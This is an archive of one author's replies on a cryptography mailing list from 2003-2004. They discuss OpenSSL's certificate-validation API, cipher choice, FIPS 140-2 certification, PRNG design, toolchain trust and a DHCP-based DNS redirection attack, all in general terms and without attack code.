to explain why you don't believe that's the case as regards finding bugs;
or to withdraw your original claim, which is contingent upon it.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Is finding security holes a good idea?

2004-06-15 Thread Thor Lancelot Simon
On Mon, Jun 14, 2004 at 08:07:11AM -0700, Eric Rescorla wrote:
 in the paper. 
 
 Roughly speaking:
 If I as a White Hat find a bug and then don't tell anyone, there's no
 reason to believe it will result in any intrusions.  The bug has to

I don't believe that the premise above is valid.  To believe it, I think
I'd have to hold that there were no correlation between bugs I found and
bugs that others were likely to find; and a lot of experience tells me
very much the opposite.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Open Source Embedded SSL - Export Questions

2003-11-27 Thread Thor Lancelot Simon
On Thu, Nov 27, 2003 at 02:45:47PM +1100, Greg Rose wrote:
 At 12:27 PM 11/27/2003, Thor Lancelot Simon wrote:
 RC4 is extremely weak for some applications.  A block cipher is greatly
 preferable.
 
 I'm afraid that I can't agree with this howling logical error. RC4 is 
 showing its age, but there are other stream ciphers that are acceptable, 

Sorry if I mislead -- that was intended as two separate statements, and I
was also in a bit of a hurry.

Yes, of course there are applications for which a stream cipher is preferable
to a block cipher.  However, in my experience, programmers often choose RC4
(or another fast stream cipher) by using speed as their only criterion, and
then end up applying it in applications in which a block cipher would be a
better choice.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Open Source Embedded SSL - Export Questions

2003-11-26 Thread Thor Lancelot Simon
On Wed, Nov 26, 2003 at 02:56:40PM -0800, J Harper wrote:
 Great feedback, let me elaborate.  I realize that AES is implemented in
 hardware for many platforms as well.  I'll mention a bit more about our
 cryptography architecture below.  Do you know why AES is so popular in
 embedded?  ARC4 is faster in software and extremely small code size.  It

RC4 is extremely weak for some applications.  A block cipher is greatly
preferable.

There isn't _quite_ a speed/strength tradeoff in cryptography, but any
time you choose algorithms based purely on speed, you'd better get really,
really suspicious about the strength of what you're producing.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Thor Lancelot Simon
On Wed, Oct 22, 2003 at 05:08:32PM -0400, Tom Otvos wrote:
 
  So what purpose would client certificates address? Almost all of the use
  of SSL domain name certs is to hide a credit card number when a consumer
  is buying something. There is no requirement for the merchant to
  identify and/or authenticate the client  the payment infrastructure
  authenticates the financial transaction and the server is concerned
  primarily with getting paid (which comes from the financial institution)
  not who the client is.
 
 
 The CC number is clearly not hidden if there is a MITM.

Can you please posit an *exact* situation in which a man-in-the-middle
could steal the client's credit card number even in the presence of a
valid server certificate?  Can you please explain *exactly* how using a
client-side certificate rather than some other form of client authentication
would prevent this?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Trusting the Tools - was Re: Open Source ...

2003-10-12 Thread Thor Lancelot Simon
On Thu, Oct 09, 2003 at 07:45:01PM -0700, Bill Frantz wrote:
 At 8:18 AM -0700 10/7/03, Rich Salz wrote:
 Are you validating the toolchain?  (See Ken Thompson's
 Turing Aware lecture on trusting trust).
 
 With KeyKOS, we used the argument that since the assembler we were using
 was written and distributed before we designed KeyKOS, it was not feasible
 to include code to subvert KeyKOS.  How do people feel about this form of
 argument?

Not too good.  If I knew what the target processor were, I think I could
arrange to do some damage to most general-purpose operating systems; they
all have to do some of the same fundamental things.

This is a bit more sophisticated than what Thompson's compiler did, but
it's the same basic idea.  There are some basic operations (in particular
on the MMU) that you can recognize regardless of their specific form and
subvert in a progammatic manner such that it's highly likely that you can
exploit the resulting weakness at a later date, I think.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-05 Thread Thor Lancelot Simon
On Sun, Oct 05, 2003 at 03:04:00PM +0100, Ben Laurie wrote:
 Thor Lancelot Simon wrote:
 
  On Sat, Oct 04, 2003 at 02:09:10PM +0100, Ben Laurie wrote:
  
 Thor Lancelot Simon wrote:
 
 these operations.  For example, there is no simple way to do the most
 common certificate validation operation: take a certificate and an optional
 chain, and check that the certificate is signed by an accepted root CA, or
 that each certificate in the chain has the signing property and that the
 chain reaches that CA -- which would be okay if OpenSSL did the validation
 for you automatically, but it doesn't, really.
 
 Err, yes it does, but its not very well documented.
  
  
  No.  You can't do it in one step, and you have to use functions that are
  marked in OpenSSL's header files as not being part of the official API.
  mod_ssl has a convenience function that's confusingly named just like the
  OpenSSL library functions that deals with this -- of course, it should be
  part of OpenSSL itself, but at least as of 0.9.6 it was not.
 
 Would you care to be more explicit?

I have to apologize -- I was not entirely correct in my initial statement,
but without access to the source tree I did most of my OpenSSL work in
(it belongs to a former employer) it took me a while to retrace my steps
and realize I was not quite right.

On the client side, though the documentation's poor, you're correct: there
_is_ a way to validate a certificate and chain you've received from the peer
in one step.  (I note that there is now reference in the header files to
some AUTOCHAIN stuff that I don't recall from earlier versions of OpenSSL,
but that ssl_verify_cert_chain is *still* not part of the public API; it's 
in ssl_locl.h).

On the server side (or, indeed, on the client side, if the client side 
needs to follow a chain to reach a trusted CA, and thus needs to load chain 
certificates) there's no API for loading a cert and its entire chain in one 
shot, and indeed to do so AFAICT you must use functions that are not part of 
the public API.  

See SSL_CTX_use_certificate_chain() in the mod_ssl sources (which appears 
much simpler in mod_ssl 2.8 than what I remember working with -- perhaps the 
OpenSSL API *has* improved!) and SSL_use_certificate_file, 
SSL_CTX_use_certificate_file, and SSL_CTX_use_certificate_chain_file in the 
OpenSSL sources.  And then note that *all* of the example code gets this
stuff wrong -- if it even bothers to do server certificate validation at
all.

I can't lose my impression that some of the chain-handling functions moved
from ssl_locl.h to ssl.h between 0.9.6 and 0.9.7 but I don't have a 0.9.6
tree handy nor the time to sift through it.  Sigh.  I wish I had some of
my code from the last time I tackled this issue with OpenSSL at hand, but
unfortunately I don't own it, so I do not.

The complexity and instability of the API for this stuff, and the fact that
we're both rooting around *in the OpenSSL source code* to figure out which
bits of it are public and which are internal, and in which version of
OpenSSL, when the operations at hand (loading and validating chains of
certificates, from the cert for the peer's identity up to the cert from
which trust derives) is a pretty good example, itself, of why I don't care
for OpenSSL.  I spent a long time working on the X.509 support in Pluto,
too, and though I don't really care for it either it does have the decided
advantage that it appears to be designed in the right direction: from what
are the end-user's needs? instead of what is the structure of the
underlying protocol or software abstraction?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-04 Thread Thor Lancelot Simon
On Sat, Oct 04, 2003 at 02:09:10PM +0100, Ben Laurie wrote:
 Thor Lancelot Simon wrote:
  As far as what OpenSSL does, if you simply abandon outright any hope of
  acting as a certificate authority, etc. you can punt a huge amount of
  complexity; if you punt SSL, you'll lose quite a bit more.  As far as the
  programming interface goes, I'd read Eric's book and then think hard about
  what people actually use SSL/TLS for in the real world.  It's horrifying
  to note that OpenSSL doesn't even have a published interface for a some of
  these operations.  For example, there is no simple way to do the most
  common certificate validation operation: take a certificate and an optional
  chain, and check that the certificate is signed by an accepted root CA, or
  that each certificate in the chain has the signing property and that the
  chain reaches that CA -- which would be okay if OpenSSL did the validation
  for you automatically, but it doesn't, really.
 
 Err, yes it does, but its not very well documented.

No.  You can't do it in one step, and you have to use functions that are
marked in OpenSSL's header files as not being part of the official API.
mod_ssl has a convenience function that's confusingly named just like the
OpenSSL library functions that deals with this -- of course, it should be
part of OpenSSL itself, but at least as of 0.9.6 it was not.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Choosing an implementation language

2003-10-03 Thread Thor Lancelot Simon
On Fri, Oct 03, 2003 at 04:31:26PM -0400, Tyler Close wrote:
 On Thursday 02 October 2003 09:21, Jill Ramonsky wrote:
  I was thinking of doing a C++ implentation with classes and
  templates and stuff.  (By contrast OpenSSL is a C
  implementation). Anyone got any thoughts on that?
 
 Given the nature of recent, and past, bugs discovered in the
 OpenSSL implementation, it makes more sense to implement in a
 memory-safe language, such as python, java or squeak. Using a VM

I strongly disagree.  While an implementation in a typesafe language
would be nice, such implementations are already available -- one's
packaged with Java, for instance.

From my point of view, the starting point of this discussion could be
restated as The world needs a simple, portable SSL/TLS implementation 
that's not OpenSSL, because the size and complexity of OpenSSL has been 
responsible for slowing the pace of SSL/TLS deployment and for a large 
number of security holes.

For practical purposes, if such an implementation is to be useful to
the majority of the people who would use it to build products in the
real world, it needs to be in C or _possibly_ C++; those are the only
languages for which compilers *and* runtime environments exist
essentially everywhere.  Coming from a background building routers and
things like routers, I can also tell you that if you're going to
require carrying a C++ runtime around, a lot of people building embedded
devices will simply not give you the time of day.

An implementation in a safe language would be _nice_, but religion
aside (please!) it's a cold hard fact that very few products that
people actually use are written in such languages -- if you leave Java
(which already has an SSL implementation) out, very few becomes
essentially zero.  And if we're interested in improving the security
of not only our pet projects, but of the interconnected world in
general, it seems to me that producing a good, simple, comprehensible,
small implementation *and getting it into as many products as possible*
would be one of the better possible goals to work towards.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-02 Thread Thor Lancelot Simon
On Thu, Oct 02, 2003 at 02:21:29PM +0100, Jill Ramonsky wrote:
 
 Thanks everyone for the SSL encouragement. I'm going to have a quick 
 re-read of Eric's book over the weekend and then start thinking about 
 what sort of easy to use implementation I could do. I was thinking of 
 doing a C++ implentation with classes and templates and stuff. (By 
 contrast OpenSSL is a C implementation). Anyone got any thoughts on 

A C++ implementation will be much less useful to many potential users;
perhaps the most underserved set of potential SSL/TLS users is in the
embedded space, and they often can't afford to, or won't, carry a C++
runtime around with them.  We learned this lesson with FreSSH and
threads.

I would strongly recommend a C implementation with an optional C++
interface, if C++ is the way you want to go.

Also, I'd consider, for simplicity's sake, at least at first, implementing
*only* TLS, and *only* the required ciphers/MACs (actually, using others'
implementations of the ciphers/MACs, even the OpenSSL or cryptlib ones,
is probably not just acceptable but actually a _really good idea_.)  The
major problems with OpenSSL are, from my point of view, caused by severe
overengineering in the areas of:

1) Configuration
2) ASN.1/X.509 handling
3) Tightly-coupled support for the many diverse variants of SSL/TLS.

As far as what OpenSSL does, if you simply abandon outright any hope of
acting as a certificate authority, etc. you can punt a huge amount of
complexity; if you punt SSL, you'll lose quite a bit more.  As far as the
programming interface goes, I'd read Eric's book and then think hard about
what people actually use SSL/TLS for in the real world.  It's horrifying
to note that OpenSSL doesn't even have a published interface for a some of
these operations.  For example, there is no simple way to do the most
common certificate validation operation: take a certificate and an optional
chain, and check that the certificate is signed by an accepted root CA, or
that each certificate in the chain has the signing property and that the
chain reaches that CA -- which would be okay if OpenSSL did the validation
for you automatically, but it doesn't, really.

From my point of view, a _very_ simple interface that:

1) Creates a socket-like connection object

2) Allows configuration of the expected identity of the party at the other
   end, and, optionally, parameters like acceptable cipher suite

3) Connects, returning error if the identity doesn't match.  It's
   probably a good idea to require the application to explicitly
   do another function call validating the connection if it decides to
   continue despite an identity mismatch; this will avoid a common,
   and dangerous, programmer errog.

4) Provides select/read operations thereafter.

Would serve the purposes of 90+% of client applications.  On the server
side, you want a bit more, and you may want a slightly finer-grained
extended interface for the client, but still, you can catch a _huge_
fraction of what people do now with only the interface listed above.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-01 Thread Thor Lancelot Simon
On Wed, Oct 01, 2003 at 10:20:53PM +0200, Guus Sliepen wrote:
 
 You clearly formulated what we are doing! We want to keep our crypto as
 simple and to the point as necessary for tinc. We also want to
 understand it ourselves. Implementing our own authentication protocol
 helps us do all that.
 
 Uhm, before getting flamed again: by our own, I don't mean we think we
 necessarily have to implement something different from all the existing
 protocols. We just want to understand it so well and want to be so
 comfortable with it that we can implement it ourselves.

In that case, I don't see why you don't bend your efforts towards
producing an open-source implementation of TLS that doesn't suck.
If you insist on not using ESP to encapsulate the packets -- which in
my opinion is a silly restriction to put on yourself; the ESP encapsulation
is extremely simple, to the point that one of my former employers has a
fully functional implementation that works well at moderate data rates
on an 8088 running MS-DOS! -- TLS is probably exactly what you're looking
for.

Note that it's *entirely* possible to use ESP without using IKE for the
user/host authentication and key exchange.  Nothing is preventing you
from using TLS or its moral equiavalent to exchange keys -- and looking
at some of the open-source IKE implementations, it's easy to see how
this would be a tempting choice.  Indeed, there's no reason your ESP
implementation would need to live in the kernel; I already know of more
than one that simple grabs packets using the kernel's tunnel driver, for
portability reasons.

However, if for what seem to me to be very arbitrary reasons you insist on
using an encapsulation that's not ESP, I urge you to use TLS for the whole
thing.  As I and others have pointed out here, if you're willing to *pay* 
for it, you can have your choice of TLS implementations that are simple, 
secure, and well under 100K.  Compare and contrast with the behemoth that 
is OpenSSL and it's easy to see why you wouldn't want to use the 
open-source implementation that is available to you now, but there is no 
reason you could not produce one yourself that was much less awful.

You say that you object to existing protocols because you want simplicity
and performance.  I say that it's not reasonable of you to blame the
failures of the existing *open-source implementations* of those protocols
on the protocols themselves.  I think that both the multiple good, small,
simple commercial SSL/TLS implementations and the two MS-DOS IPsec
implementations are good examples that demonstrate that what you should
object to, more properly, is lousy software design and implementation on
the part of many open-source protocol implementors, not lousy protocol design
in cases where the protocol design is actually quite good.  So if you're
going to set out to fix something, I think if you're trying to fix the
protocols, you're wasting your effort -- there are existing, widely
peer-reviewed and accepted protocols that are *already* about as simple
as they can get and still be secure the way users actually use them in the
real world.  I think that it would make a lot more sense to fix the lousy 
implementation quality instead; that way you seem much more likely to 
achieve your security, performance, and simplicity goals.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-15 Thread Thor Lancelot Simon
On Mon, Sep 15, 2003 at 12:57:55PM -0400, Wei Dai wrote:
 
 I think I may have found such a written guidance myself. It's guidance 
 G.5, dated 8/6/2003, in the latest Implementation Guidance for FIPS 
 140-2 on NIST's web site: 
 http://csrc.nist.gov/cryptval/140-1/FIPS1402IG.pdf. This section seems 
 especially relevant:
 
 For level 1 Operational Environment, the software cryptographic module 
 will remain compliant with the FIPS 140-2 validation when operating on 
 any general purpose computer (GPC) provided that: 
 
 a. the GPC uses the specified single user operating system/mode 
 specified on the validation certificate, or another compatible single 
 user operating system, and 
 
 b. the source code of the software cryptographic module does not 
 require modification prior to recompilation to allow porting to another 
 compatible single user operating system.
 (end quote)
 
 The key word here must be recompilation. The language in an earlier 

Unfortunately, another key set of words is single user.  This would seem
to significantly limit the value of a software-only certification...


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-08 Thread Thor Lancelot Simon
On Mon, Sep 08, 2003 at 10:49:02AM -0600, Tolga Acar wrote:
 On a second thought, that there is no key management algorithm 
 certified, how would one set up a SSL connection in FIPS mode?
 
 It seems to me that, it is not possible to have a FIPS 140 certified 
 SSL/TLS session using the OpenSSL's certification.

SSL's not certifiable, period.

TLS has been held to be certifiable, and products using TLS have been
certified.  However, it's necessary to disable any use of MD5 in the
certificate validation path.  When I had a version of OpenSSL certified
for use in a product at my former employer, I had to whack the OpenSSL
source to throw an error if in FIPS mode and any part of the certificate
validation path called the MD5 functions.  Perhaps this has been done
in the version currently undergoing certification.  You'll also need
certificates that use SHA1 as the signing algorithm, which some public
CAs cannot provide (though most can, and will if the certificate request
itself uses SHA1 as the signing algorithm).

The use of MD5 in the TLS protocol itself is okay, because it is always
used in combination with SHA1 in the PRF.  We got explicit guidance from
NIST on this issue.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: PRNG design document?

2003-08-29 Thread Thor Lancelot Simon
On Fri, Aug 29, 2003 at 11:27:41AM +0100, Ben Laurie wrote:
  
  As you mentioned, the FIPS-140-2 approved PRNG 
  are deterministic, they take a random seed and extend it
  to more random bytes.  But FIPS-140-2 has no 
  provision for generating the seed in the first place, 
  this is where something like Yarrow or the cryptlib
  RNG come in handy.
 
 Actually, FIPS-140 _does_ have provision for seeding, at least for X9.17
 (you use the time :-), but not for keying.

I think there's some confusion of terminology here.  A time, Ti for each
iteration of the algorithm, is one of the inputs to the X9.17 generator
(otherwise, you might as well just use DES/3DES in any chaining or feedback
mode, for all practical purposes).  However, it has always been permitted
to use a free-running counter instead of the time, and indeed the current 
interpretation by NIST *requires* that a counter, not the time, be used.

As for keying, you're allowed to key with whatever you want, whenever you
want, but at least from my conversations with a number of people during a
recent certification, you'd better be prepared to explain why your source
of key material is strong.

One implementation with which I was involved essentially rekeyed the
generator as soon as enough entropy had accumulated from a hardware
source; another rekeyed it depending on the number of output blocks.
Both approaches are permissible.

I do have some more thoughts on the quality of the various generators
the standard allows but I haven't had time to get them down in writing;
I'll try to do so before this thread is totally stale...

-- 
 Thor Lancelot Simon  [EMAIL PROTECTED]
   But as he knew no bad language, he had called him all the names of common
 objects that he could think of, and had screamed: You lamp!  You towel!  You
 plate! and so on.  --Sigmund Freud

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: PRNG design document?

2003-08-26 Thread Thor Lancelot Simon
On Fri, Aug 22, 2003 at 10:00:14AM -0700, Bob Baldwin PlusFive wrote:
 Tim,
  One issue to consider is whether the system
 that includes the PRNG will ever need a FIPS-140-2
 rating.  For example, people are now working on
 a FIPS-140 validation for OpenSSL.  If so, then
 the generator for keys and IVs MUST be a FIPS
 approved algorithm, whether or not there are

That's not quite right.

1) Various entities have already had various versions of 
   OpenSSL FIPS-140-2 certified.

2) It is permissible to use a non-Approved deterministic
   RNG for IV generation, though not for keying.

Since it's permissible to rekey the Approved PRNG, and there is no
requirement for _how_ it is rekeyed save that the input must not have
demonstrably less entropy than the output, it is possible to use, if
not Yarrow, a _very_ similar design by using an entropy pool collecting
input from one or more hardware sources to periodically rekey the
Approved X9.17 generator.

I am informed that in the past, implementations using Yarrow have, in
fact, been certified, passing the code examination in the lab by
documenting that Yarrow's output stage is, in fact, algorithmically
equivalent to the X9.17 generator.  Unfortunately, since those products
were certified, there have been some particularly ill-considered
interpretations of the X9.17 RNG specification by NIST which I believe
would now make it impossible to have a Yarrow implementation certified;
but you can get very close.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: LibTomNet [v0.01]

2003-07-08 Thread Thor Lancelot Simon
On Tue, Jul 08, 2003 at 02:20:46PM -0700, Eric Murray wrote:
 
 For comparison purposes, I have a copy of an SSLv3/TLS client library
 I wrote in 1997.   It's 56k of (Intel Linux) code for everything
 except RSA.   That includes the ASN.1 and X.509 parser.
 Implementing the server-specific parts would add only another
 couple k.  This was done for a handheld computer but runs on
 unix as well.

I believe the Certicom library is somewhere around there in size, and
it is a pretty extensive implementation.  Costs money though. ;-)

 OpenSSL is huge because it's also a general purpose crypto lib, supports
 a bunch of hardware and a bunch of algorithms, SSLv2 (ew), old apis, 
 non-blocking, etc etc.

It's also hideously overabstracted.  That, to my mind, is why it's both
hard to use and hard to maintain.  Unfortunately, its API is the only
one that is in wide use on Unix systems, which means that any alternative
would probably be forced to duplicate a frightening amount of OpenSSL's
internal complexity in order to present its _external_ complexity.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Attacking networks using DHCP, DNS - probably kills DNSSEC

2003-06-28 Thread Thor Lancelot Simon
On Sat, Jun 28, 2003 at 01:06:03PM -0700, Bill Stewart wrote:
 Somebody did an interesting attack on a cable network's customers.
 They cracked the cable company's DHCP server, got it to provide a
 Connection-specific DNS suffic pointing to a machine they owned,
 and also told it to use their DNS server.
 This meant that when your machine wanted to look up yahoo.com,
 it would look up yahoo.com.attackersdomain.com instead.

This problem is old and well-understood.  It is why there is work
in the IETF to combine the acquisition of a DHCP lease with the
acquisition of an initial IPsec SA to integrity-protect that
lease.

It's not easy for me to see why anyone would expect anything *but*
that MITM attacks against client systems that are entirely
configured by DHCP would be practical.  If the DHCP client and
server share no cryptographic guarantee of trust...

..oh, I'm sorry, I forgot that the anacephalic have fallen for
you can magic up trust out of nowhere about ten times in
succession in my immediately previous area of work, 802.11. :-)

Where I used to work, at ReefEdge, we disposed of the 802.11
security garbage and used a TLS-based solution that was not
entirely unlike PIC, dispensing temporary credentials for use
with IKE to users based on their legacy authentication.  As the
designer and maintainer of this system, I became *very* cognizant
of DHCP-based and DNS-based attacks, and very skeptical of the
sort of proposal someone brought be every few days suggesting
that some later establishment of a trust relationship could
overcome a successful MITM attack on one of the early stages of
the client's boot up and get SA negotiation.

(of course, I also became very skeptical of many other folks'
use legacy credentials to bootstrap IKE techniques; there
are implementations out there in widespread use which default
to only authentication methods that are trivially MITMed, and
at least one I can think of that _can not be configured_ to
do standard IKE in a secure way.  Ouch! But the simultaneous
IKE and DHCP proposal I read a few years ago at the London
IETF seemed pretty sound.)

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]